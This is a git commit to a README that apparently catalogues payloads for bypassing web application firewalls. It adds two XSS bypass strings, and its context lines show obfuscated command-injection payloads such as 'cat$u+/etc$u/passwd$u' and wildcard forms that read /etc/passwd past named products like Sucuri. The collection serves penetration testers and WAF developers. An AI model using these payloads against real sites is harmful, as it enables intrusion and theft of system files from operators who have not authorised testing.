Updated some bypasses for some WAFs

2024-10-01 04:35:35 -04:00 · 2019-07-11 12:04:16 +05:30 · 2019-07-11 12:04:16 +05:30 · 84280f3751
commit 84280f3751
parent 179eda145d
1 changed files with 9 additions and 1 deletions
--- a/README.md
+++ b/README.md
@ -2977,6 +2977,10 @@ xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
 ```
 <--`<img/src=` onerror=confirm``> --!>
 ```
+- [XSS Bypass](https://twitter.com/le4rner/status/1146453980400082945) by [@Shiva Krishna](https://twitter.com/le4rner)
+```
+javascript:{alert`0`}
+```
 - [RCE Payload Detection Bypass](https://www.secjuice.com/web-application-firewall-waf-evasion/) by [@theMiddle](https://twitter.com/Menin_TheMiddle)
 ```
 cat$u+/etc$u/passwd$u
@ -3294,7 +3298,7 @@ https://host:2000/proxy.html?action=manage&main=log&show=deny_log&proxy=>"<scrip
 ```

 ### Sucuri
- [Smuggling RCE Payloads through Sucuri](https://medium.com/secjuice/waf-evasion-techniques-718026d693d8) by [@theMiddle](https://twitter.com/Menin_TheMiddle)
+- [Smuggling RCE Payloads](https://medium.com/secjuice/waf-evasion-techniques-718026d693d8) by [@theMiddle](https://twitter.com/Menin_TheMiddle)
 ```
 /???/??t+/???/??ss??
 ```
@ -3303,6 +3307,10 @@ https://host:2000/proxy.html?action=manage&main=log&show=deny_log&proxy=>"<scrip
 ;+cat+/e'tc/pass'wd
 c\\a\\t+/et\\c/pas\\swd
 ```
+- [XSS Bypass](https://twitter.com/return_0x/status/1148605627180208129) by [@Luka](https://twitter.com/return_0x)
+```
+"><input/onauxclick="[1].map(prompt)">
+```

 ### URLScan
 - [Directory Traversal](https://github.com/0xInfection/Awesome-WAF/blob/master/papers/Beyond%20SQLi%20-%20Obfuscate%20and%20Bypass%20WAFs.txt#L557) by [@ZeQ3uL](http://www.exploit-db.com/author/?a=1275) (<= v3.1) (Only on ASP.NET)